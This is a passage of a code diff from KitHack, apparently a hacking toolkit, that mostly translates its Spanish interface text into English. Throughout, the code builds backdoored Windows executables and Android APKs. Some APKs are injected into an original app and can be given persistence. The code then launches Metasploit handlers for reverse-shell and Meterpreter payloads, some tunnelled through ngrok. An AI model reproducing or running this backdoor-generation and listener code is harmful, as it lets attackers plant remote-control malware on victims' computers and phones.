LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input("\n{0}Ingrese un nombre para su archivo de salida: {1}".format(YELLOW, DEFAULT)) + OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) time.sleep(4) @@ -1574,24 +1564,24 @@ def main(): location = os.getcwd() if os.stat('output/{}.exe'.format(mainout)).st_size != 0: print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.exe".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": + if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": os.system('systemctl stop postgresql && clear') main() else: if not ".tcp.ngrok.io" in LHOST: os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD windows/meterpreter/reverse_tcp_dns; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("\n{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() else: os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD windows/meterpreter/reverse_tcp_dns; exploit\'"') - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("\n{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() else: - print("{}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) + print("{}[X] An error has occured whilst generating the backdoor\n".format(RED)) time.sleep(3) - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() @@ -1599,7 +1589,7 @@ def main(): run_network() LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input("\n{0}Ingrese un nombre para su archivo de salida: {1}".format(YELLOW, DEFAULT)) + OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) time.sleep(4) @@ -1607,24 +1597,24 @@ def main(): location = os.getcwd() if os.stat('output/{}.exe'.format(mainout)).st_size != 0: print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.exe".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": + if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": os.system('systemctl stop postgresql && clear') main() else: if not ".tcp.ngrok.io" in LHOST: os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD windows/metsvc_reverse_tcp; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("\n{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() else: os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD windows/metsvc_reverse_tcp; exploit\'"') - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("\n{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() else: - print("{}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) + print("{}[X] An error has occured whilst generating the backdoor\n".format(RED)) time.sleep(3) - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() @@ -1632,7 +1622,7 @@ def main(): run_network() LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input("\n{0}Ingrese un nombre para su archivo de salida: {1}".format(YELLOW, DEFAULT)) + OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) time.sleep(4) @@ -1640,24 +1630,24 @@ def main(): location = os.getcwd() if os.stat('output/{}.exe'.format(mainout)).st_size != 0: print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.exe".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": + if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": os.system('systemctl stop postgresql && clear') main() else: if not ".tcp.ngrok.io" in LHOST: os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD windows/powershell_reverse_tcp; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("\n{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() else: os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD windows/powershell_reverse_tcp; exploit\'"') - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("\n{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() else: - print("{}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) + print("{}[X] An error has occured whilst generating the backdoor\n".format(RED)) time.sleep(3) - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() @@ -1665,7 +1655,7 @@ def main(): run_network() LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input("\n{0}Ingrese un nombre para su archivo de salida: {1}".format(YELLOW, DEFAULT)) + OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) time.sleep(4) @@ -1673,31 +1663,31 @@ def main(): location = os.getcwd() if os.stat('output/{}.exe'.format(mainout)).st_size != 0: print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.exe".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": + if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": os.system('systemctl stop postgresql && clear') main() else: if not ".tcp.ngrok.io" in LHOST: os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD windows/shell_reverse_tcp; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("\n{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() else: os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD windows/shell_reverse_tcp; exploit\'"') - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("\n{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() else: - print("{}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) + print("{}[X] An error has occured whilst generating the backdoor\n".format(RED)) time.sleep(3) - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() else: - print("\n{}[X] OPCION INVALIDA\n".format(RED)) + print("\n{}[X] INVALID OPTION\n".format(RED)) time.sleep(3) - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("{}Press any key to continue...".format(GREEN)) os.system('clear') main() @@ -1732,7 +1722,7 @@ def main(): Tk().withdraw() icon = filedialog.askopenfilename(title = "KITHACK - SELECT ICON PNG",filetypes = (("png files","*.png"),("all files","*.*"))) print("\n{0}ICON: {1}".format(YELLOW, icon)) - OUT = input("\n{0}Ingrese un nombre para su archivo de salida: {1}".format(YELLOW, DEFAULT)) + OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] var = input("\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)) file = open("/tmp/data.txt", "w") @@ -1769,30 +1759,30 @@ def main(): time.sleep(4) os.system('rm -rf output/payload output/payload.apk output/kithack.apk') print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": + if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": os.system('systemctl stop postgresql && clear') main() else: if not ".tcp.ngrok.io" in LHOST: os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/meterpreter_reverse_http; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("\n{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() else: os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/meterpreter_reverse_http; exploit\'"') - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("\n{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() else: - print("\n{0}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) + print("\n{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) time.sleep(3) os.system('rm -rf output/payload output/payload.apk output/kithack.apk') - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() # Salida de bucle - OUT = input("\n{0}Ingrese un nombre para su archivo de salida: {1}".format(YELLOW, DEFAULT)) + OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] var = input("\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)) print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) @@ -1808,24 +1798,24 @@ def main(): print("{0}File: {1}/output/{2}.sh".format(DEFAULT, location, mainout)) break print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": + if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": os.system('systemctl stop postgresql && clear') main() else: if not ".tcp.ngrok.io" in LHOST: os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/meterpreter_reverse_http; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("\n{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() else: os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/meterpreter_reverse_http; exploit\'"') - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("\n{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() else: - print("\n{0}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) + print("\n{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) time.sleep(3) - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() @@ -1844,7 +1834,7 @@ def main(): Tk().withdraw() APK = filedialog.askopenfilename(title = "KITHACK - SELECT APK ORIGINAL",filetypes = (("apk files","*.apk"),("all files","*.*"))) print("\n{0}APK ORIGINAL: {1}".format(YELLOW, APK)) - OUT = input("\n{0}Ingrese un nombre para su archivo de salida: {1}".format(YELLOW, DEFAULT)) + OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] var = input("\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)) print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) @@ -1860,24 +1850,24 @@ def main(): print("{0}File: {1}/output/{2}.sh".format(DEFAULT, location, mainout)) break print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": + if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": os.system('systemctl stop postgresql && clear') main() else: if not ".tcp.ngrok.io" in LHOST: os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/meterpreter_reverse_http; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("\n{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() else: os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/meterpreter_reverse_http; exploit\'"') - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("\n{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() else: - print("\n{0}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) + print("\n{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) time.sleep(3) - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() @@ -1888,7 +1878,7 @@ def main(): Tk().withdraw() APK = filedialog.askopenfilename(title = "KITHACK - SELECT APK ORIGINAL",filetypes = (("apk files","*.apk"),("all files","*.*"))) print("\n{0}APK ORIGINAL: {1}".format(YELLOW, APK)) - OUT = input("\n{0}Ingrese un nombre para su archivo de salida: {1}".format(YELLOW, DEFAULT)) + OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] var = input("\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)) print("\n{0}[*] Generating payload...{1}".format(GREEN, DEFAULT)) @@ -1924,39 +1914,39 @@ def main(): time.sleep(4) os.system('rm -rf output/original output/payload output/original.apk output/payload.apk output/kithack.apk') print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": + if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": os.system('systemctl stop postgresql && clear') main() else: if not ".tcp.ngrok.io" in LHOST: os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/meterpreter_reverse_http; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("\n{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() else: os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/meterpreter_reverse_http; exploit\'"') - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("\n{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() else: - print("\n{0}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) + print("\n{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) time.sleep(3) os.system('rm -rf output/original output/payload output/original.apk output/payload.apk output/kithack.apk') - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() else: - print("\n{}[X] OPCION INVALIDA\n".format(RED)) + print("\n{}[X] INVALID OPTION\n".format(RED)) time.sleep(3) - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("{}Press any key to continue...".format(GREEN)) os.system('clear') main() else: - print("\n{}[X] OPCION INVALIDA\n".format(RED)) + print("\n{}[X] INVALID OPTION\n".format(RED)) time.sleep(3) - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("{}Press any key to continue...".format(GREEN)) os.system('clear') main() @@ -1979,7 +1969,7 @@ def main(): Tk().withdraw() icon = filedialog.askopenfilename(title = "KITHACK - SELECT ICON PNG",filetypes = (("png files","*.png"),("all files","*.*"))) print("\n{0}ICON: {1}".format(YELLOW, icon)) - OUT = input("\n{0}Ingrese un nombre para su archivo de salida: {1}".format(YELLOW, DEFAULT)) + OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] var = input("\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)) file = open("/tmp/data.txt", "w") @@ -2016,30 +2006,30 @@ def main(): time.sleep(4) os.system('rm -rf output/payload output/payload.apk output/kithack.apk') print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": + if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": os.system('systemctl stop postgresql && clear') main() else: if not ".tcp.ngrok.io" in LHOST: os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/meterpreter_reverse_https; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("\n{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() else: os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/meterpreter_reverse_https; exploit\'"') - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("\n{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() else: - print("\n{0}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) + print("\n{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) time.sleep(3) os.system('rm -rf output/payload output/payload.apk output/kithack.apk') - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() # Salida de bucle - OUT = input("\n{0}Ingrese un nombre para su archivo de salida: {1}".format(YELLOW, DEFAULT)) + OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] var = input("\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)) print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) @@ -2055,24 +2045,24 @@ def main(): print("{0}File: {1}/output/{2}.sh".format(DEFAULT, location, mainout)) break print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": + if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": os.system('systemctl stop postgresql && clear') main() else: if not ".tcp.ngrok.io" in LHOST: os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/meterpreter_reverse_https; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("\n{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() else: os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/meterpreter_reverse_https; exploit\'"') - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("\n{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() else: - print("\n{0}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) + print("\n{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) time.sleep(3) - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() @@ -2091,7 +2081,7 @@ def main(): Tk().withdraw() APK = filedialog.askopenfilename(title = "KITHACK - SELECT APK ORIGINAL",filetypes = (("apk files","*.apk"),("all files","*.*"))) print("\n{0}APK ORIGINAL: {1}".format(YELLOW, APK)) - OUT = input("\n{0}Ingrese un nombre para su archivo de salida: {1}".format(YELLOW, DEFAULT)) + OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] var = input("\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)) print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) @@ -2107,24 +2097,24 @@ def main(): print("{0}File: {1}/output/{2}.sh".format(DEFAULT, location, mainout)) break print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": + if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": os.system('systemctl stop postgresql && clear') main() else: if not ".tcp.ngrok.io" in LHOST: os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/meterpreter_reverse_https; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("\n{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() else: os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/meterpreter_reverse_https; exploit\'"') - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("\n{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() else: - print("\n{0}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) + print("\n{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) time.sleep(3) - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() @@ -2135,7 +2125,7 @@ def main(): Tk().withdraw() APK = filedialog.askopenfilename(title = "KITHACK - SELECT APK ORIGINAL",filetypes = (("apk files","*.apk"),("all files","*.*"))) print("\n{0}APK ORIGINAL: {1}".format(YELLOW, APK)) - OUT = input("\n{0}Ingrese un nombre para su archivo de salida: {1}".format(YELLOW, DEFAULT)) + OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] var = input("\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)) print("\n{0}[*] Generating payload...{1}".format(GREEN, DEFAULT)) @@ -2171,39 +2161,39 @@ def main(): time.sleep(4) os.system('rm -rf output/original output/payload output/original.apk output/payload.apk output/kithack.apk') print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": + if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": os.system('systemctl stop postgresql && clear') main() else: if not ".tcp.ngrok.io" in LHOST: os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/meterpreter_reverse_https; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("\n{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() else: os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/meterpreter_reverse_https; exploit\'"') - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("\n{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() else: - print("\n{0}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) + print("\n{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) time.sleep(3) os.system('rm -rf output/original output/payload output/original.apk output/payload.apk output/kithack.apk') - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() else: - print("{}\n[X] OPCION INVALIDA\n".format(RED)) + print("{}\n[X] INVALID OPTION\n".format(RED)) time.sleep(3) - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("{}Press any key to continue...".format(GREEN)) os.system('clear') main() else: - print("\n{}[X] OPCION INVALIDA\n".format(RED)) + print("\n{}[X] INVALID OPTION\n".format(RED)) time.sleep(3) - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("{}Press any key to continue...".format(GREEN)) os.system('clear') main() @@ -2225,7 +2215,7 @@ def main(): Tk().withdraw() icon = filedialog.askopenfilename(title = "KITHACK - SELECT ICON PNG",filetypes = (("png files","*.png"),("all files","*.*"))) print("\n{0}ICON: {1}".format(YELLOW, icon)) - OUT = input("\n{0}Ingrese un nombre para su archivo de salida: {1}".format(YELLOW, DEFAULT)) + OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] var = input("\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)) file = open("/tmp/data.txt", "w") @@ -2262,30 +2252,30 @@ def main(): time.sleep(4) os.system('rm -rf output/payload output/payload.apk output/kithack.apk') print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": + if 